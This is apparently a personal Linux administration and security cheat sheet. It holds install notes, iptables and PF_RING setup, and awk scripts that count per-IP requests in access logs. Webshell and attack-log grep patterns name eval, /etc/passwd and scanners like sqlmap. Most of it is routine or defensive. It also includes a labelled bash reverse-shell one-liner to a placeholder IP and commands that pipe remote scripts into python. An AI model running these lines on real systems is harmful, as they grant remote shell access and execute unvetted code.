echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer oracle-java8-set-default
#http://www.webupd8.org/2014/03/how-to-install-oracle-java-8-in-debian.html
#iptables删除已有规则(行号简单版本)
iptables -L INPUT --line-numbers #列出指定的链的规则的编号来
iptables -D INPUT 3 #例如上面要删除一个INPUT链的规则的话可以这样
#chrome 直接获取网络封包
chrome://net-internals/
#centos 7 安装 pfring-drivers-zc
yum install dkms kernel-devel
rpm -Uvh http://packages.ntop.org/rpm7/Packages/e1000e-zc-3.2.7.1.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/i40e-zc-2.3.6.1633-1dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/igb-zc-5.3.3.5.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/ixgbe-zc-5.0.4.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/pfring-dkms-7.1.0-1633.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/pfring-drivers-zc-dkms-1.2-0.noarch.rpm
#then check that the module is loaded: lsmod | grep pf
pf_ring 1238340 2
#批量清空某个目录下的所有文件
find . -type f -exec cp /dev/null {} \;
#ubuntu debian 设置网卡启动,但是不给分配ip
auto eth1
iface eth1 inet manual
#制作u盘启动盘 centos windows
Win32 Disk Imager
rufus
#这两个工具比较方便
#rar命令行加密
rar a -hpasdfasdfasdfasdfasdfasdf test.rar xxx.tar #加密头和数据
rar a -pasdfasdfasdfasdfasdfasdf test.rar xxx.tar #只加密数据
#https://www.rarlab.com/download.htm linux rar 下载
#dnsmasq安装
resolv-file=/etc/resolv.dnsmasq.conf
strict-order
no-hosts
addn-hosts=/etc/dnsmasq_hosts
cache-size=1500
listen-address=172.31.114.114 #listen-address这个必须加, 不然跨网段就不能回复dns查询结果了
#raspberry备份
dd if=/dev/sdb | gzip>/tmp/img_backup2.gz
#还原
dd if=/root/2016-02-09-raspbian-jessie-lite.img of=/dev/sdb bs=4M
dd if=2016-02-09-raspbian-jessie-lite.img | pv | sudo dd of=/dev/sdX bs=4M
#raspberry还原
sudo gzip -dc /home/pi/img_backup.gz | sudo dd of=/dev/xxx
#raspberry备份1
dd if=/dev/mmcblk0 of=pi-debian-unencrypted-backup.img
#cpu压力测试
sysbench --test=cpu --num-threads=8 --max-requests=100000 run
sysbench --test=cpu --num-threads=1 --max-requests=10000 run
#/tmp 目录防止清空
#cat /etc/tmpfiles.d/tmp.conf
d /tmp 1777 root root 20d
#wget下载JDK
wget --header "Cookie: oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u131-b11/d54c1d3a095b4ff2b6607d096fa80163/jdk-8u131-linux-x64.tar.gz
#jdk8
https://www.so-cools.com/test/jdk8.tar.gz
#jdk 镜像
http://mirrors.linuxeye.com/jdk/
#Fixing a mysql upgrade error
#error shown after apt-get upgrade:
# insserv: warning: current start runlevel(s) (empty) of script `mysql' overrides LSB defaults (2 3 4 5)
#at first glance this looked easy, but
#systemctl enable mysql still failed:
#Synchronizing state of mysql.service with SysV init with /lib/systemd/systemd-sysv-install...
#Executing /lib/systemd/systemd-sysv-install enable mysql
#insserv: warning: current start runlevel(s) (empty) of script `mysql' overrides LSB defaults (2 3 4 5).
#update-rc.d: error: no runlevel symlinks to modify, aborting!
#then I remembered mysql had been disabled with sysv-rc-conf earlier
sysv-rc-conf mysql on
apt-get upgrade
# aria2c下载
aria2c -c -x16 -s20 -j20 http://www.xxx.com/xx.exe
#编译apk
#查看详细报错信息
/opt/android-studio/gradle/gradle-2.14.1/bin/gradle build --stacktrace
#Count per-IP requests within a time window from web access logs; usable for CC-attack detection
#gawk is required
apt-get install gawk
#Sample log
157.15.14.19 - - 06 Sep 2016 09:13:10 +0300 "GET /index.php?id=1 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:13:11 +0300 "GET /index.php?id=2 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:13:12 +0300 "GET /index.php?id=3 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:14:13 +0300 "GET /index.php?id=4 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:14:14 +0300 "GET /index.php?id=5 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:15 +0300 "GET /index.php?id=6 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:16 +0300 "GET /index.php?id=7 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:17 +0300 "GET /index.php?id=8 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:16:10 +0300 "GET /index.php?id=9 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:16:10 +0300 "GET /index.php?id=10 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
8.8.8.8 - - 06 Sep 2016 09:17:10 +0300 "GET /index.php?id=11 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
9.9.9.9 - - 06 Sep 2016 09:17:10 +0300 "GET /index.php?id=12 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:18:10 +0300 "GET /index.php?id=13 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:19:10 +0300 "GET /index.php?id=14 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:19:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:20:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
123.123.123.123 - - 06 Sep 2016 09:21:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:22:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
cat 5.txt |awk '{print $7,$1}' |awk -F: '{print $1*60+int($2/2),$0}' |sort |uniq -c -f2 |awk '{if($1>5){print $0}}'
#or
awk -v Interval=5 -v Trig=5 -F '[[:blank:]]*|:' '
{
ThisTime = $7 * 60 + $8
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = $4 " " $5 " " $6 " " $7 ":" sprintf( "%2d", ( $8 - ( $8 % Interval) )) ":00"
LastTic = $7 * 60 + ( $8 - ( $8 % Interval) )
}
# add this line to new cycle
IPCounts[ $1]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' YourFile
#若日志样本为
op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST /zabbix/jsrpc.php?output=json-rpc HTTP/1.1" 200 77 "0.316" "op.g.cc/?ddreset=1&sid="; "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)" "-" "-"upstream_response_time "0.316" request_time "0.316" dd.g.cc 60.223.153.54 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.53:8012 "GET /?ts=1479670682&uid=&mid=&cs= HTTP/1.1" 200 479 "0.039" "-" "Dalvik/2.1.0 (Linux; U; Android 5.0.2; Redmi Note 2 MIUI/V8.0.2.0.LHMCNDG)" "-" "5.0.1.0002"upstream_response_time "0.039" request_time "0.039"
#则整理脚本为
awk -v Interval=5 -v Trig=1000 -F '[[:blank:]]*|:' '
{
# using format log
# 157.15.14.19 - - 06 Sep 2016 09:13:10 +0300 "GET /index.php?id=1 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
# $1 2 3 4 5 6 7 8 9 10 11 ...
ThisTime = $6 * 60 + $7
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = $5 ":" $6 ":" sprintf( "%2d", ( $7 - ( $7 % Interval) )) ":00 +800]"
LastTic = $6 * 60 + ( $7 - ( $7 % Interval) )
}
# add this line to new cycle
IPCounts[ $2]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' access.log-20161122
# for format of log
# op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST ...
# $1 2 3 4 5 6 7 8 9 10 11 ...
# changes compared with the first script:
# replace $7 with $6 and $8 with $7, and use:
# LastTime = $5 ":" $6 ":" sprintf( "%2d", ( $7 - ( $7 % Interval) )) ":00 +800]"
# IPCounts[ $2]++
#The log above can span multiple days (mind the spaces in the variable calculations, otherwise the script errors out)
awk -v Interval=5 -v Trig=10 -F '[[:blank:]]*|\\[|/|:' '
{
# using log format (FS also splits on "[", "/" and ":", so hour/minute move from $6/$7 to $9/$10 and $6 becomes the day)
# op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST ...
# $1      $2             $3 $4  $6 $7  $8   $9 $10 $11 ...
ThisTime =$6 * 10000 + $9 * 60 + $10
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = "[" $6 "/" $7 "/" $8 ":" $9 ":" sprintf( "%02d", ( $10 - ( $10 % Interval) )) ":00 +0800]"
LastTic = $6 * 10000 + $9 * 60 + ( $10 - ( $10 % Interval) )
}
# add this line to new cycle
IPCounts[ $2]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' access.log-20161122
# op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST ...
# $1 2 3 4 5 6 7 8 9 10 11 12
#Reverse shell
bash -i >& /dev/tcp/1.2.3.4/7788 0>&1
#Listen on the other side: nc -l 7788
#Count connections by TCP state
netstat -n|grep ^tcp|awk '{print $NF}'|sort -nr|uniq -c
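#Equivalent with ss on systems without net-tools (a sketch, assuming iproute2 is installed):
ss -ant | awk 'NR>1{print $1}' | sort | uniq -c | sort -nr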
#Statically compile openresty (alpine recommended)
wget https://github.com/openresty/openresty/releases/download/v1.11.2.2/openresty-1.11.2.2.tar.gz --no-check-certificate
wget https://www.openssl.org/source/openssl-1.1.0c.tar.gz --no-check-certificate
apk add linux-headers
apk add libressl-dev
apk add libcrypto1.0
./configure --with-ld-opt="-static" && make -j2 && make install
#alpine docker (use adduser to add users)
FROM alpine
ENV NGINX_VER nginx-1.11.6
ENV OPENSSL_VER openssl-1.0.2j
#ENV OPENSSL_VER openssl-1.1.0-pre6
# apk add linux-headers
RUN echo "http://mirrors.ustc.edu.cn/alpine/v3.5/main" > /etc/apk/repositories \
&& echo "http://mirrors.ustc.edu.cn/alpine/v3.5/community" >> /etc/apk/repositories
RUN apk update
RUN apk add \
pcre-dev \
zlib-dev \
g++ \
make \
perl \
wget
#urldecode for easier reading
cat luban.log | grep sqlmap | awk '{print $7}' | xargs -n1 python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])' #python2; -n1 decodes one URL per call
#Delete lines containing a matching string
sed -i '/keywords/d' access.log
#Batch-extract packets from full-traffic captures and strip the noisy headers
#!/bin/bash
for file in ` ls $1 `
do
parse_pcap -vvb $file | grep -vE 'Host:|Cookie:|User-Agent:|Accept:|Accept-Language:|Accept-Encoding:|Connection:|Content-Type:|Content-Length|Server'
done
#Obtain the HTTPS master key
openssl s_client -ign_eof -connect 123.57.55.183:443 < <( echo -e "GET / HTTP/1.1\nHost: www.so-cools.com\nConnection: close\n\n" ) | grep 'Session-ID:\|Master-Key:'
echo "export SSLKEYLOGFILE=~/tls/sslkeylog.log" >> ~/.bash_profile && . ~/.bash_profile #then just open the browser; note only the pre-master secrets are logged
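#Sketch of feeding the key log to tshark for offline decryption (capture.pcap is a hypothetical file; older tshark builds name the preference ssl.keylog_file instead of tls.keylog_file):
tshark -r capture.pcap -o tls.keylog_file:"$HOME/tls/sslkeylog.log" -Y http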
#wireshark: build against the pf_ring-based libpcap
#install the pf_ring-based libpcap first
#download and extract the wireshark source
./configure --prefix /opt/wireshark/build/ --with-libcap=/opt/pf_rinf/build --with-qt=4 --with-gtk=no --enable-tfshark --with-lua --with-geoip && make &&make install
#LDFLAGS="-L/opt/pf_rinf/build/lib" CFLAGS="-I/opt/pf_rinf/build/include" make #running make this way does not work
#note: add the pf_ring lib path to a file under /etc/ld.so.conf.d/ and run ldconfig
#Check a .so file's version
readelf -a xxx.so.1.7.4 #then look for the version number in the output
#Find newly created/modified files
#!/bin/bash
while getopts 'p:t:d:' OPT; do
case $OPT in
p)
filepath="$OPTARG";;
t)
mtime="$OPTARG";;
d)
isdebug="$OPTARG";;
?)
echo "Usage: `basename $0` -p path -t modify_time_days -d show_permission_errors"
esac
done
if [[ -z $filepath ]] ; then
filepath="/home/tomcat/"
fi
if [[ -z $mtime ]] ; then
mtime="1"
fi
if [[ -z $isdebug ]] ; then
cmd_str="find ${filepath} \( -iname '*.php' -o -iname '*.jsp' \) -mtime -${mtime} 2>/dev/null"
else
cmd_str="find ${filepath} \( -iname '*.php' -o -iname '*.jsp' \) -mtime -${mtime}"
fi
result=$(eval $cmd_str)
if [[ -z $result ]] ; then
echo "no_file_found_wow"
else
echo "$result"
fi
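#Usage sketch, assuming the script above is saved as findnew.sh (hypothetical name):
bash findnew.sh -p /home/tomcat/ -t 3 -d 1 #list .php/.jsp files changed in the last 3 days and show permission errors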
#The semicolon in shell is a command separator (you can think of it as a newline)
#Variant 1
test(){
if [ 1 -eq 1 ]; then
echo "1=1"
else
echo "1!=1"
fi
}
#Variant 2
test1(){
if [ 1 -eq 1 ]
then echo "1=1"
else echo "1!=1"
fi
}
#Variant 3 (single line)
test2(){ if [ 1 -eq 1 ] ; then echo "1=1" ; else echo "1!=1" ; fi }
#Install flash for firefox
#Download the NPAPI package from https://get.adobe.com/cn/flashplayer/otherversions/
cp libflashplayer.so /usr/lib/firefox/browser/plugins/
#Installing debian from USB on a physical machine that lacks NIC firmware
First download a debian image, e.g. 8.6
Make the bootable USB stick with universal-usb-installer (do not use win32diskimager: the stick it produces has non-writable folders, so you cannot add the driver files needed later). Note: in Step 1 choose the last entry, "try unlisted linux iso"
Download http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/jessie/current/firmware.zip, unzip it, and copy everything inside into the firmware folder on the USB stick
Download firmware-realtek_0.43_all.deb, unpack it with dpkg, and copy lib/firmware into the firmware folder on the USB stick
Boot and install as usual; the "missing firmware: rtl_nic/rtl8105e-1.fw" prompt should no longer appear
After the first login, run apt-get install firmware-linux-nonfree
#Install NIC firmware on debian
apt-get install firmware-*
#iptables port mirroring (the daemonlogger tool can also mirror traffic, or use https://code.google.com/archive/p/port-mirroring/ )
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147
iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147
iptables -t mangle -A PREROUTING -d 0.0.0.0/0 -j TEE --gateway 172.20.8.147
iptables -t mangle -A POSTROUTING -s 0.0.0.0/0 -j TEE --gateway 172.20.8.147
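#Hedged notes, not from the original: the TEE target needs the xt_TEE kernel module and an iptables build with TEE support
modprobe xt_TEE
#review or remove the mirror rules later, e.g. for the mangle table:
iptables -t mangle -L PREROUTING -n --line-numbers
iptables -t mangle -D PREROUTING 1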
#Convert linux terminal colour highlighting to HTML (e.g. render highlighted ls/grep output as HTML)
#aha
apt-get install aha && grep "a" /etc/passwd | aha > /tmp/a.html
#ansi2html
apt-get install kbtin && grep "a" /etc/passwd | ansi2html > /tmp/a.html
#php ansi-color: convert terminal highlighting to HTML (same idea as above)
https://github.com/Alanaktion/ansispan-php #only supports older PHP versions; newer versions are not supported yet
#Find world-writable directories
#!/bin/bash
search_dir=$(pwd)
writable_dirs=$(find $search_dir -type d -perm 0777)
for dir in $writable_dirs
do
#echo $dir
find $dir -type f -name '*.php'
done
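#-perm 0777 above matches mode 0777 exactly; to catch any world-writable directory, a variant (assuming GNU find) is:
find "$search_dir" -type d -perm -0002 2>/dev/null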
#grep webshell
grep --colour=always -n -i -E -e '(eval|eval_r|exec|passthru|shell_exec|system|proc_open|ReflectionFunction|assert|fwrite|fopen)\s*\(\s*(\\\$|\$)(HTTP_POST_VARS|HTTP_GET_VARS|HTTP_SERVER_VARS |_POST|_REQUEST|_GET|_SESSION|_SERVER)\s*\[\s*' -e 'eval\s*\(\s*[^\)]*base64_decode' -e '(\$|\\\$)_(GET|POST)\s*\[.*?\]\s*\(\s*(\$|\\\$)_(GET|POST)\s*\[' -e 'chr\s*\(*\s*ord\s*\(\s*' -e '(gzuncompress|gzinflate)\s*\(\s*base64_decode\s*\(' -e 'chr\s*\(\s*[0-9]+\s*\)\s*\.\s*chr\s*\(\s*[0-9]+\s*\)' -e '\$.+=\s*[.-"]assert[.-"]\s*;' -e '\b(pack)\s*\(.*\);' -e '\\x[0-9]+\\x[0-9]+\\x[0-9]+' -e '(udp|tcp):\/\/' -e 'function_exists\s*\(\s*[.-"](popen|exec|proc_open|system|passthru|posix_kill|posix_getpwuid|posix_getegid)[.-"]\s*\)' -e '\\x[0-9]+' -e '(c99shell|permission\s*denide|\/etc\/passwd|exploit-db\.com|web\s*shell|\/\*-\/\*-\*\/|\/bin\/sh|phpinfo\s*\(|str_rot13\s*\()' -e '\$\{[.-"](_POST|_REQUEST|_GET|_SESSION|_SERVER)[.-"]\}' -e 'preg_replace\s*\(.*\/e.*\,\s*\$(_POST|_REQUEST|_GET|_SESSION|_SERVER)\s*' -e 'e[.-"]\s*\.\s*[.-"]v[.-"]\s*\.\s*[.-"]a[.-"]\s*\.\s*[.-"]l' -e 'ev[.-"]\s*\.\s*[.-"]a[.-"]\s*\.\s*[.-"]l' -e 'ev[.-"]\s*\.\s*[.-"]al' -e 'eva[.-"]\s*\.\s*[.-"]l' xxx.php
grep --colour=always -n -i -E -e 'getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(' -e 'Runtime\s*\.\s*getRuntime' -e 'getRealPath\s*\(' -e 'PythonInterpreter' -e '\/tmp\/' xxx.jsp
#Install pf_ring (run each step below from the PF_RING source tree root)
git clone https://github.com/ntop/PF_RING.git
apt-get install linux-headers-3.16.0-4-amd64
cd kernel/ && make && make install
cd userland/lib/ && ./configure --prefix=/usr/local/pfring && make && make install
cd userland/libpcap/ && ./configure --prefix=/usr/local/pfring && make && make install
cd userland/tcpdump/ && ./configure --prefix=/usr/local/pfring && make && make install
#Load the kernel module
insmod /lib/modules/3.16.0-4-amd64/kernel/net/pf_ring/pf_ring.ko && lsmod |grep pf_ring
/sbin/modprobe pf_ring transparent_mode=0 min_num_slots=65534 && cat /proc/net/pf_ring/info
echo "/sbin/modprobe pf_ring transparent_mode=0 min_num_slots=65534" >> /etc/rc.local #load the module at boot
#Difference between curl and wget when piping an install script to an interpreter
#wget needs -O - to write the download to stdout, while curl writes to stdout by default
wget "http://xxxx/test/a1.py" -O - |python - /
curl http://xxxxx/test/a1.py |python - /
#ansible reboot
ansible all -i hosts -u root -k -m shell -a "shutdown -r +1" -f 10
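#Newer ansible (2.7+) also ships a dedicated reboot module, so a sketch of the same task is:
ansible all -i hosts -u root -k -m reboot -f 10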
#grep for concatenated strings such as "$xxx='e'.'va'.'l';"
grep -n -i -E -e 'e[ !-0]*v[ !-0]*a[ !-0]*l[ !-0]*' #note: wrap the -e pattern in single quotes (double quotes have too many pitfalls); if the regex itself needs a single quote, a range like [!-0] already covers many special characters, which works around the problem
#Single quotes vs. double quotes in grep
grep "$a" file #expands variable a and searches for its value
grep '$a' file #searches for the literal string $a
grep '\\' file #searches for the \ character
grep "\\\\" file #searches for the \ character
# $ ` \ " keep their special meaning inside double quotes; inside single quotes nothing is special
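#Quick demo of the rule above:
a=root
echo "$a" #prints: root
echo '$a' #prints: $a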
##xargs + find + grep: search keywords across multiple file types
find /var/log \( -iname "*.php" -o -iname "*.txt" \) -print0 |xargs -i --null grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'union.+select.*HTTP/(1|2)\.' {} #note: -o, -a and -not mean OR, AND and NOT; wrap multiple conditions in \( \)
#xargs + find + grep: search keywords
find /var/log -iname "*.php" -print0 |xargs -i --null grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'union.+select.*HTTP/(1|2)\.' {} #note: find -print0 plus xargs --null cope with special characters in file names
#Find files modified between now and 10 days ago
find /home/ -name "*.php" -mtime -10 #mtime, ctime and atime mean different things (content modified / metadata changed / last accessed)
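#Related variants, assuming GNU find: -mmin works in minutes, -newermt takes an absolute cutoff
find /home/ -name "*.php" -mmin -60 #modified within the last hour
find /home/ -name "*.php" -newermt "2016-09-01" #modified since 2016-09-01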
#vbox bridged networking errors
#run as root
modprobe vboxdrv
modprobe vboxnetflt
#Unpack a script packed with gzexe
tail -n +44 abc > a.gz #line 44 is the first garbled line, i.e. where the gzip data starts
gunzip a.gz
#Real-world example: unpack a self-contained installer
tail -n +77 Xmirror3.1.0.3116_ubuntu_x64.bin > new.tar.gz
tar zxvf new.tar.gz #finishes the unpacking
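#A gzexe wrapper records the offset in a skip= line, so the start line can be read instead of guessed (a sketch; plain self-extracting installers may not carry it):
skip=$(awk -F= '/^skip=/{print $2; exit}' abc)
tail -n +$skip abc > a.gz && gunzip a.gz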
#Sync files on the rsync client side
rsync -av --bwlimit=1500 iov_read@172.1.0.24:/data/backup/weblog/nginx-common/ /data/rsync/
datestr=$(date +"%Y-%m-%d %H:%M:%S")
echo $datestr >> /opt/rsync/cron.txt
#Count the files in each subfolder
for i in $(ls -d */|awk '{print $1}');do echo $i $(ls "./"$i -lR |wc -l);done
for i in $(ls -d */);do echo $i $(ls $i -lR|wc -l) files $(du -sh $i|awk '{print $1}');done
for i in $(ls -d */);do echo $i $(ls $i -lR 2>/dev/null|wc -l) $(du -sh $i 2>/dev/null|awk '{print $1}');done |sort -k 2 -nr
#Get the file content between lines x and y
awk 'NR >= 1 && NR <= 2' /etc/passwd
sed -n '5,6p' /etc/passwd
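#Equivalent with head/tail: print lines 5-6
head -n 6 /etc/passwd | tail -n 2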
#Monitor a file and extract the newly appended lines
OLD_IFS="$IFS"
IFS=" "
while watchInfo=`inotifywait -q --format '%e %f' -e modify,create /tmp/test1/db`;do
IFS=" "
watchInfo=($watchInfo)
lines=`wc -l /tmp/test1/db/${watchInfo[1]}`
linesarr=($lines)
offsetinfo=`cat /tmp/offset`
if [ -z "$offsetinfo" ] ; then
info=`sed -n "1,${linesarr[0]}p" /tmp/test1/db/${watchInfo[1]}`
else
offsetinfoarr=($offsetinfo)
startline=$(echo "${offsetinfoarr[0]}+1"|bc)
info=`sed -n "$startline,${linesarr[0]}p" /tmp/test1/db/${watchInfo[1]}`
fi
echo "${linesarr[0]} ${watchInfo[1]}" > /tmp/offset
echo $info
done
IFS="$OLD_IFS"
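#Hedged notes for the loop above: inotifywait ships with inotify-tools, and /tmp/offset should exist before the first run so the first cat does not error
apt-get install inotify-tools
: > /tmp/offset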
1. Bash pitfalls: http://blog.charlee.li/bash-pitfalls/
2. Bash and whitespace: http://www.igigo.net/post/archives/152
#Quickly find modified files
1 Install md5deep or hashdeep; md5deep is recommended (https://github.com/madscientist42/md5deep)
2 Create a snapshot with md5deep
md5deep -r /tmp/test1/ > /tmp/md54.txt or find /tmp/test1 -type f -print0 |xargs -0 md5sum > /tmp/md54.txt
3 Verify
md5sum -c /tmp/md54.txt
#or
md5sum -c /tmp/md51.txt 2>/dev/null|grep "失败" |awk '{print $1}' #"失败" is the localized "FAILED" string; under an English locale grep for "FAILED"
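#hashdeep also has a built-in audit mode (a sketch; the snapshot must have been produced by hashdeep itself, /tmp/hashes.txt is a hypothetical path):
hashdeep -r /tmp/test1/ > /tmp/hashes.txt
hashdeep -r -a -k /tmp/hashes.txt /tmp/test1/ || echo "files changed"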
#md5sum verification (variant 1)
find ./ -type f -print0 | xargs -0 md5sum > ./my.md5
md5sum -c my.md5
#Find recently modified files
find $1 -type f -exec stat --format '%Y :%y :%n' "{}" \; |grep -v "wpdatabase"|sort -nr |cut -d: -f2- | head -n 50
#iptables: match an IP range
iptables -A INPUT -m iprange --src-range 192.168.1.2-192.168.1.7 -j DROP
iptables -A INPUT -m iprange --dst-range 192.168.1.2-192.168.1.7 -j DROP
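#When the range lines up with a CIDR block, -s/-d with a mask works without the iprange module (192.168.1.0/29 covers .0-.7):
iptables -A INPUT -s 192.168.1.0/29 -j DROP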
#Security audit of access logs
time grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'java\.lang.*HTTP/(1|2)\.' -e '\.\./.*HTTP/(1|2)\.' -e 'information_schema.*HTTP/(1|2)\.' -e 'etc/passwd.*HTTP/(1|2)\.' -e 'xwork\.MethodAccessor.*HTTP/(1|2)\.' -e '/\*!.*\*/.*HTTP/(1|2)\.' -e '%3C(%20)*(iframe|script|body|img|layer|div)%3E.*HTTP/(1|2)\.' -e '(cmd|diy|shell|phpspy|jspspy).*\.jsp.*HTTP/(1|2)\.' -e '(vhost|bbs|hostname|wwwroot|www|site|root|hytop|flashfxp).*\.(rar|zip|tar.gz|gz).*HTTP/(1|2)\.' -e '(attachments|upimg|images|css|uploadfiles|html|uploads|templets|static|template|data|inc|forumdata|upload|includes|cache|avatar).*\.(jsp|php).*HTTP/(1|2)\.' -e '\.(svn|git|htaccess|bash_history|bak|inc|old|mdb|sql|backup|java|class|rar|zip|tar.gz|gz).*HTTP/(1|2)\.' -e '(HTTrack|harvest|audit|dirbuster|pangolin|nmap|sqln|x-scan|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|PycURL|zmeu|BabyKrokodil|netsparker|httperf|bench|appscan)' -e '(cmd|diy|shell|phpspy|jspspy|b374k).*\.php.*HTTP/(1|2)\.' logs/new.log
#Batch-decompress .gz files
#!/bin/bash
#paths="/data/etc_nginx_logs/logs"
paths="/data/var_log_nginx/logs"
#savepath="/ungzdata/etc"
savepath="/ungzdata/var"
for i in `cd ${paths} && ls *.gz`
do
echo $i
gunzip -c ${paths}/$i > ${savepath}/$i.log
done
#Find differences / compare files
diff --changed-group-format="%>" --unchanged-group-format="" file1 file2
sdiff 1.txt 2.txt |grep '[<>|]'
vimdiff 1.txt 2.txt
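#When line order does not matter, comm on sorted copies shows the lines unique to each file:
comm -3 <(sort 1.txt) <(sort 2.txt)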
#Batch scp
#!/bin/bash
for line in `cat result`
do
if [[ $line =~ "var_log_nginx" ]]
then
scp -r -l 10000 $line scpuser@172.16.20.7:/data/scp/var/
else
scp -r -l 10000 $line scpuser@172.16.20.7:/data/scp/etc/
fi
done
echo "good"
#List pending security-related updates
apt-get -s dist-upgrade |grep "^Inst" |grep -i securi
#Generate file hashes for file-integrity monitoring
#python2 script (the commands module only exists in python2)
import commands
#shell equivalent
#for i in {"/etc","/bin","/sbin","/usr/bin","/usr/sbin"};do md5deep -r $i >>/usr/local/file_hashs.txt;done
dirs = ["/bin/", "/etc/", "/sbin/", "/usr/bin", "/usr/sbin"]
for dir in dirs:
    cmd = "md5deep -r " + dir + " >>/usr/local/file_hashs.txt"
    print cmd
    commands.getstatusoutput(cmd)
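#md5deep output is md5sum-compatible, so a later check can be (a sketch, assuming an English locale):
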